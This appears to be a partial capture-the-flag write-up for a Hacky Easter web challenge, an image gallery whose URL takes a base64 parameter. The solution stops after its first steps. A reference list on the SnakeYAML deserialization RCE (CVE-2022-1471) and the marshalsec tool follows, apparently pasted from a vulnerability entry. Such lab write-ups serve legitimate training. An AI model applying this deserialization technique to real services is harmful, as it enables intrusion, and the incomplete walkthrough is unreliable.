I'm a big fan of digital art!
How do you like my new gallery?
http://ch.hackyeaster.com:2307
[digitalsnakeart.zip](writeupfiles/digitalsnakeart.zip)
Note: The service is restarted every hour at x:00.
## Solution
The website is a set of images generated by DALL-E
and e.g. the "Snakes in space" page looks like:
and has a URL like:
```
http://ch.hackyeaster.com:2307/art?art=bmF
```
References:
- http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html
- http://www.openwall.com/lists/oss-security/2023/11/19/1
- https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479
- https://confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html
- https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2
- https://github.com/mbechler/marshalsec
- https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc
- https://infosecwriteups.com/%EF%B8%8F-inside-the-160-comment-fight-to-fix-snakeyamls-rce-default-1a20c5ca4d4c
- https://security.netapp.com/advisory/ntap-20230818-0015/
- https://security.netapp.com/advisory/ntap-20240621-0006/
- https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true
Published: 2022-12-01